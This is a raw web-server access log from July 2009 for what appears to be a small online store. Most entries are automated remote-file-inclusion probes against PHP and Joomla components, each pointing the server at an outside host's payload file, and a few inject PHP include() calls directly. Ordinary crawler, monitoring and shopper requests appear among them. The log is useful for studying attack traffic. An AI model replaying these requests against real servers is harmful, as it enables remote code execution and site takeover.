218.146.231.194 - - [06/Jul/2009:01:51:51 -0400] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jul/2009:01:52:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.43.229.5 - - [06/Jul/2009:01:53:14 -0400] "GET /popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 207 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:01:53:15 -0400] "GET /logs/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 212 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:01:53:15 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:01:53:35 -0400] "GET /logs/error_log.Q109062300%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
60.43.229.5 - - [06/Jul/2009:01:54:12 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:54:18 -0400] "GET /logs/access_log.Q109053000///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
67.208.139.72 - - [06/Jul/2009:01:56:04 -0400] "GET /logs/access_log.Q109052000////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:56:04 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:56:04 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:56:54 -0400] "GET /logs/access_log.Q109052000%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:56:55 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:56:55 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:57:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jul/2009:01:57:06 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:07 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:07 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:07 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:08 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:08 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:08 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
218.246.20.221 - - [06/Jul/2009:01:57:09 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:01:57:09 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:01:57:10 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
218.246.20.221 - - [06/Jul/2009:01:57:10 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:01:57:10 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
218.246.20.221 - - [06/Jul/2009:01:57:12 -0400] "GET /logs/access_log.Q109061200/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:01:57:12 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:12 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:57:13 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.208.139.72 - - [06/Jul/2009:01:57:22 -0400] "GET /logs/access_log.Q109052000%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:57:26 -0400] "GET /popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:57:26 -0400] "GET /logs/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:57:26 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:01:57:42 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:01:57:43 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:01:57:43 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:01:57:56 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
218.249.36.194 - - [06/Jul/2009:01:58:17 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jul/2009:01:58:36 -0400] "GET /logs/access_log.Q109060200//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:01:58:36 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:01:58:36 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:01:58:36 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:01:58:43 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:01:59:11 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:59:14 -0400] "GET /logs/access_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:59:33 -0400] "GET /logs/access_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:59:42 -0400] "GET /logs/access_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:01:59:56 -0400] "GET /logs/access_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
65.55.106.235 - - [06/Jul/2009:02:00:19 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.18.161.226 - - [06/Jul/2009:02:00:26 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:00:27 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
119.93.90.155 - - [06/Jul/2009:02:00:28 -0400] "GET /logs/access_log.Q109062700/index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:00:55 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:01:09 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
67.208.139.72 - - [06/Jul/2009:02:01:12 -0400] "GET /logs/access_log.Q109052000////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:01:15 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:01:15 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:01:15 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:01:49 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
67.208.139.72 - - [06/Jul/2009:02:01:55 -0400] "GET //?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:01:56 -0400] "GET /logs//?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:01:56 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:01 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:02 -0400] "GET /popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:02 -0400] "GET /logs/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:02:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jul/2009:02:02:29 -0400] "GET /popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:30 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:34 -0400] "GET /logs/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:02:50 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:02:03:14 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:02:03:28 -0400] "GET /logs/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:02:03:28 -0400] "GET /popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:02:03:29 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:02:04:19 -0400] "GET /index.php?meio=http://brant.3x.ro/test.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
60.43.229.5 - - [06/Jul/2009:02:04:28 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:02:04:28 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:02:04:40 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:02:04:41 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:02:04:41 -0400] "GET /logs/access_log.Q109063000%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:02:04:41 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:02:04:41 -0400] "GET /logs/access_log.Q109060700%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:05:40 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:05:40 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:05:40 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:05:47 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:49 -0400] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8396 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:49 -0400] "GET /logs/access_log.Q109051800///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:49 -0400] "GET ///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 457 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:51 -0400] "GET /logs/access_log.Q109051800///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:51 -0400] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8396 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:51 -0400] "GET ///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 457 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:54 -0400] "GET /logs/access_log.Q109061600///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:05:55 -0400] "GET /logs/access_log.Q109061600///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.55.106.235 - - [06/Jul/2009:02:06:26 -0400] "GET /images/items/EcOm/ HTTP/1.1" 200 2245 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [06/Jul/2009:02:07:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [06/Jul/2009:02:07:07 -0400] "GET /errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:07:07 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:07:07 -0400] "GET /logs/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:07:54 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:02:07:54 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:08:12 -0400] "GET /logs/access_log.Q109052400%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
67.208.139.72 - - [06/Jul/2009:02:08:56 -0400] "GET /logs/access_log.Q109051800%20%20///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:08:56 -0400] "GET /logs/access_log.Q109061600%20%20///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:02:08:57 -0400] "GET /logs/access_log.Q109051900//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:09:14 -0400] "GET /logs/access_log.Q109051800%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:09:15 -0400] "GET /logs/access_log.Q109061600%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:02:09:18 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
173.55.186.225 - - [06/Jul/2009:02:10:02 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
173.55.186.225 - - [06/Jul/2009:02:10:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
173.55.186.225 - - [06/Jul/2009:02:10:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
173.55.186.225 - - [06/Jul/2009:02:10:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
91.121.89.135 - - [06/Jul/2009:02:10:25 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:02:10:43 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:02:10:43 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:02:10:43 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:10:46 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:12:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [06/Jul/2009:02:12:13 -0400] "GET /logs/access_log.Q109062300/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:02:13:29 -0400] "GET /images/items/0531031_thumb.jpg HTTP/1.1" 200 2888 "-" "Googlebot-Image/1.0"
201.160.249.77 - - [06/Jul/2009:02:14:56 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 109645 "http://sn105w.snt105.mail.live.com/mail/InboxLight.aspx?n=1871635881" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
123.143.98.5 - - [06/Jul/2009:02:15:07 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
123.143.98.5 - - [06/Jul/2009:02:15:08 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [06/Jul/2009:02:15:08 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
201.160.249.77 - - [06/Jul/2009:02:15:12 -0400] "GET /promo.htm HTTP/1.1" 301 314 "http://sn105w.snt105.mail.live.com/mail/InboxLight.aspx?n=1871635881" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:15:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 46021 "http://sn105w.snt105.mail.live.com/mail/InboxLight.aspx?n=1871635881" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:15:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
